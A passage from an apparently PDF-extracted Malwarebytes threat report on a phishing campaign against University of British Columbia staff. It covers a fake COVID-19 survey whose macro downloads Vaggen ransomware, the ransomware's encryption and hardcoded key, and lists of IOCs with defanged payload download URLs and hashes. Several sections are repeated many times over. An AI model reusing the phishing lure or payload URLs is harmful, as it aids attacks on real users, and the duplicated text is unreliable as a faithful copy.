3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2025 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2026 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2027 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2028 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2029 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2030 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2031 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2032 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2033 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2034 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2035 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2036 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2037 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2038 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2039 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2040 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2041 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2042 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2043 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2044 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2045 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2046 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2047 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2048 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2049 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2050 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2051 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2052 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2053 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2054 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2055 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2056 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2057 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2058 of 